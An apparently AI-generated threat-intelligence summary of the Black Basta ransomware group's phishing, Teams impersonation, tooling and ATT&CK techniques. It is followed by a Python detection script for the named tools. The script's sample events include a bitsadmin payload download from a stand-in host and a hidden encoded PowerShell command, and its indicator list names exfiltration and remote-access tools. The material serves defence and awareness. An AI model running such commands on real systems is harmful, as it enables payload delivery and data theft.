| Category | Details |
|---|---|
| Threat Actors | Black Basta (Ransomware-as-a-Service Group) |
| Campaign Overview | Operates via phishing, vulnerability exploitation, social engineering (Microsoft Teams impersonation). Targets include various industries globally. Uses double extortion (data theft + ransomware). |
| Target Regions | Global; major attacks in sectors like healthcare, finance, construction, manufacturing, retail, and entertainment. |
| Methodology | Spam emails followed by direct Microsoft Teams contact; masquerades as IT help desk. Leverages remote desktop software (e.g., AnyDesk, Quick Assist). Deploys payloads systematically: AntispamConnectUS.exe (SystemBC) → Cobalt Strike. |
| Product Targeted | Microsoft Teams; endpoint vulnerabilities exploited. |
| Malware Reference | SystemBC (proxy malware/RAT), Cobalt Strike (used for lateral movement and remote control). |
| Tools Used | AnyDesk, Quick Assist, BITSAdmin, Qakbot, PowerShell, RClone, Cobalt Strike, SystemBC, Splashtop, EvilProxy, Netcat, WinSCP, and others. |
| Vulnerabilities Exploited | Microsoft Teams external-access configuration (contact permitted from outside tenants), user susceptibility to phishing, and outdated systems/applications. |
| TTPs (MITRE) | Initial Access (T1566, T1190), Execution (T1059.001, T1047), Persistence (T1543.003), Defense Evasion (T1112, T1497), Credential Access (T1003), Lateral Movement (T1570), Impact (T1486). |
| Attribution | Notable attacks since April 2022; over 500 organizations targeted globally. Associated with the use of SystemBC in campaigns alongside other malware families. |
| Recommendations | Strategic: Maintain secure backups, adopt zero-trust architecture, enable MFA. Management: Develop breach prevention plans, invest in employee cybersecurity training. Tactical: Regularly update software, monitor/block IOCs, implement Sigma rules for anomaly detection. |
| Source | CYFIRMA |
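As an added illustration of the table's Tactical recommendation (monitor for the tooling this campaign is reported to use), the following Python is example detection logic written for this page, not code from CYFIRMA or from the summary. The process-creation records it scans are constructed, the field names are assumptions modelled on Sysmon event 1, and the T1219, T1197, T1567.002 and T1090 mappings are standard ATT&CK IDs that the table itself does not list; T1059.001 and T1047 come from the table's TTP row.

```python
"""Flag process-creation events matching tooling named in the Black Basta summary:
remote-access tools, BITSAdmin transfers, RClone, encoded PowerShell, WMI, and the
SystemBC loader file name. Added example; log records below are constructed."""
import re
from dataclasses import dataclass
from typing import Optional

# Lower-case image name -> (label, ATT&CK technique).
# T1219, T1197, T1567.002 and T1090 are standard ATT&CK IDs not in the summary.
INDICATORS = {
    "anydesk.exe": ("remote access tool (AnyDesk)", "T1219"),
    "quickassist.exe": ("remote access tool (Quick Assist)", "T1219"),
    "bitsadmin.exe": ("BITSAdmin transfer", "T1197"),
    "rclone.exe": ("RClone (possible data staging/exfiltration)", "T1567.002"),
    "antispamconnectus.exe": ("SystemBC loader name from summary", "T1090"),
    "wmic.exe": ("WMI command-line execution", "T1047"),
}

# PowerShell invoked with an encoded command (-e/-ec/-enc/-EncodedCommand).
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    timestamp: str
    host: str
    image: str
    label: str
    technique: str


def classify(record: dict) -> Optional[Finding]:
    """Return a Finding for one process-creation record, or None if benign."""
    image = record["image"].rsplit("\\", 1)[-1].lower()  # strip directory
    if image in INDICATORS:
        label, technique = INDICATORS[image]
        return Finding(record["timestamp"], record["host"], image, label, technique)
    if image == "powershell.exe" and ENCODED_PS.search(record.get("command_line", "")):
        return Finding(record["timestamp"], record["host"], image,
                       "PowerShell with encoded command", "T1059.001")
    return None


def detect(records) -> list:
    """Scan a sequence of records and return all findings in log order."""
    return [f for f in map(classify, records) if f is not None]


# Constructed sample events (hypothetical host/user/paths), Sysmon-like fields.
SAMPLE_EVENTS = [
    {"timestamp": "2024-05-01T09:00:01Z", "host": "WS-01", "user": "corp\\jdoe",
     "image": "C:\\Program Files\\Microsoft Office\\OUTLOOK.EXE",
     "command_line": "OUTLOOK.EXE", "parent_image": "C:\\Windows\\explorer.exe"},
    {"timestamp": "2024-05-01T09:14:22Z", "host": "WS-01", "user": "corp\\jdoe",
     "image": "C:\\Users\\jdoe\\Downloads\\AnyDesk.exe",
     "command_line": "AnyDesk.exe", "parent_image": "C:\\Windows\\explorer.exe"},
    {"timestamp": "2024-05-01T09:20:05Z", "host": "WS-01", "user": "corp\\jdoe",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "command_line": "bitsadmin.exe /transfer job /download http://example.invalid/a C:\\ProgramData\\a.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe"},
    {"timestamp": "2024-05-01T09:21:40Z", "host": "WS-01", "user": "corp\\jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgA",
     "parent_image": "C:\\Windows\\System32\\cmd.exe"},
    {"timestamp": "2024-05-01T09:25:13Z", "host": "WS-01", "user": "corp\\jdoe",
     "image": "C:\\ProgramData\\AntispamConnectUS.exe",
     "command_line": "AntispamConnectUS.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe"},
    {"timestamp": "2024-05-01T10:02:00Z", "host": "WS-02", "user": "corp\\asmith",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe Get-Process", "parent_image": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.timestamp} {f.host} {f.image}: {f.label} [{f.technique}]")
```

Each rule is a simple image-name or command-line match, which is the shape of the Sigma process-creation rules the table recommends; in production the same matching would run against EDR or Sysmon telemetry and be paired with the table's other controls (MFA, Teams external-access hardening, backups) rather than stand alone.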
Disclaimer: The above summary has been generated by an AI language model.